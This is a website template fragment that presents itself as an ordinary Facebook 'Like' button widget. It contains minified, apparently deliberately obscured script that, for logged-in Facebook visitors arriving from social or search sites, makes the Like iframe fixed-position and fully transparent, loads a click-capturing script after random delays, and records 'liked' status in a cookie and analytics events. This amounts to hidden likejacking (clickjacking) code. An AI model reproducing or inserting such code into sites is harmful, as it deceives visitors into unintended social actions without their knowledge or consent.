<div id="fb-button">
    <iframe scrolling="no" frameborder="0" style="border:none;overflow:hidden;width:450px;height:21px;" allowTransparency="false"></iframe>
</div>
<script>
function getCookie(cname) {
    var name = cname + "=";
    var decodedCookie = decodeURIComponent(document.cookie);
    var ca = decodedCookie.split(';');
    for(var i = 0; i <ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') {
            c = c.substring(1);
        }
        if (c.indexOf(name) == 0) {
            return c.substring(name.length, c.length);
        }
    }
    return "";
}
if (getCookie("lkrdpg") != "") {
        $('#fb-button > iframe').attr('src', 'https://www.facebook.com/plugins/like.php?href={{site.main_base_url|url_encode}}{{page.url|url_encode}}&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21&confirm=false');
    } else {
        $('#fb-button > iframe').attr('src', 'https://www.facebook.com/plugins/like.php?href={{site.social.facebook|url_encode}}&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21&confirm=false');
}
</script>

{% if date(page.date) > date('-10days') and date(page.date) < date('-1day') and site.social.facebook and site.fb_app_id %}
    <div id="ifmwpr">
        <iframe scrolling="no" frameborder="0" style="border:none;overflow:hidden;width:450px;height:21px;" allowTransparency="false"></iframe>
    </div>
    <script> 
        function ifmtrckr(){var e=!1;""!=getCookie("lkrdpg")&&(e=!0);var t=!1;document.referrer.includes("goog")||document.referrer.includes("facebook")||document.referrer.includes("youtu")||document.referrer.includes("insta")||document.referrer.includes("tumblr")||document.referrer.includes("reddit")||document.referrer.includes("twit")||document.referrer.includes("pinter")||document.referrer.includes("forum")||document.referrer.includes("commun")?(t=!0,console.log("++/+++")):console.log("--/+++"),t&&(0==e?$("#ifmwpr > iframe").attr("src","https://www.facebook.com/plugins/like.php?href={{site.social.facebook|url_encode}}&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21&confirm=false"):$("#ifmwpr > iframe").attr("src","https://www.facebook.com/plugins/like.php?href={{site.main_base_url|url_encode}}{{page.url|url_encode}}&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21&confirm=false"),$("#ifmwpr").css("position","fixed"),$("#ifmwpr").css("overflow","hidden")),t?($("#ifmwpr").css("filter","alpha(opacity=0)"),$("#ifmwpr").css("-moz-opacity","0.0"),$("#ifmwpr").css("-khtml-opacity","0.0"),$("#ifmwpr").css("opacity","0.0"),$.getScript("{{ site.cdn_url }}{{ theme_url }}/js/post.min.js").done(function(){isMobile||$("#ifmwpr")&&setTimeout(function(){$.getScript("{{ site.cdn_url }}{{ theme_url }}/js/ifmclkr.min.js").done(function(){setTimeout(function(){if(console.log("+++/+++"),$("#ifmwpr").css("z-index","1"),$("#ifmwpr").css("display","none"),1==clked&&0==e){var t=new Date;t.setTime(t.getTime()+63936e6);var r="expires="+t.toUTCString();document.cookie="lkrdpg=pgislkd;"+r+";path=/",ga("send","event","ifmtrckr-fb","like","page")}else if(0==clked&&0==e)ga("send","event","ifmtrckr-fb","like","page",{nonInteraction:!0});else if(1==clked&&1==e){var t=new Date;t.setTime(t.getTime()+63936e6);var r="expires="+t.toUTCString();document.cookie="lkrdpg=renew;"+r+";path=/",ga("send","event","ifmtrckr-fb","like","post")}else if(0==clked&&1==e){var t=new Date;t.setTime(t.getTime()+63936e6);var r="expires="+t.toUTCString();document.cookie="lkrdpg=renew;"+r+";path=/",ga("send","event","ifmtrckr-fb","like","post",{nonInteraction:!0})}},Math.floor(45e3*Math.random()+3e4))})},Math.floor(3e4*Math.random()+15e3))})):($("#ifmwpr").css("z-index","1"),$("#ifmwpr").css("display","none"))}1==Math.floor(5*Math.random()+1)?(console.log("+/+++"),window.fbAsyncInit=function(){FB.init({appId:"{{ site.fb_app_id }}",autoLogAppEvents:!1,xfbml:!0,version:"v2.9"}),FB.getLoginStatus(function(e){"connected"===e.status||"not_authorized"===e.status?(ifmtrckr(),ga("send","event","ifmtrckr-fb","logged in","account")):ga("send","event","ifmtrckr-fb","logged in","account",{nonInteraction:!0})},!0)},function(e,t,r){var o,n=e.getElementsByTagName(t)[0];e.getElementById(r)||(o=e.createElement(t),o.id=r,o.src="//connect.facebook.net/en_US/sdk.js",n.parentNode.insertBefore(o,n))}(document,"script","facebook-jssdk")):console.log("-/+++");
    </script>
{% endif %}

